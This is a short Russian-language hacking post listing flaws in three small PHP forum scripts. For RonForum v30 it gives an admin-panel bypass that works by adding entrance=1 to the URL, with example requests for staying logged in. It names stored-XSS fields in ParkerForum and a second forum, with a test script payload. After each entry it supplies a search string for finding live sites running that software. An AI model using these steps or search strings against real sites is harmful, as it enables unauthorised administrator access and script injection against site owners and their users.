Форум: RonForum
Версия: v30
Доступ в админку:
Если открыть файл admin.php и посмотреть его содержимое, то можно встретить такую строку:
PHP код:
if(isset($entrance) and $entrance=="1")
Эта строка идёт после проверки пароля вводе пароля, содержимого куков, но изначально никакого значения эта переменная не имеет, ей только присваиваеться значение в случае, если пароль введён правильно.
Переходим в админку:
http://site.com/from/admin.php
Теперь присваиваем переменной
entrance необходимое значение
1:
http://site.com/from/admin.php?entrance=1
Теперь вы в админке, но есть не большой минус: при переходе по любой ссылке, значение переменной будет утеряно, что бы этого не случилось смотрим адрес ссылки, к примеру:
http://site.com/from/admin.php?what=moderators
и добавляем к ней необходмиое значение:
http://site.com/from/admin.php?entrance=1&what=moderators
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: Copyright © Kwasnikov R.P
------------------------------------------------------------
------------------------------------------------------------
Форум: ParkerForum
Версия: 0.01
Активная XSS
В поле
Сайт, при создание новой темы вводим
<script>alert();</script> - скрипт будет выплняться при просмотре главной страницы форума, а так же при просмотре темы.
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: Copyrights (C) by ademan
------------------------------------------------------------
------------------------------------------------------------
Форум: Древообразный форум
Версия: 1.0
Активная XSS
Уязвимы поля
Name и
Subject.
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: Скрипт предоставлен www.chemport.ru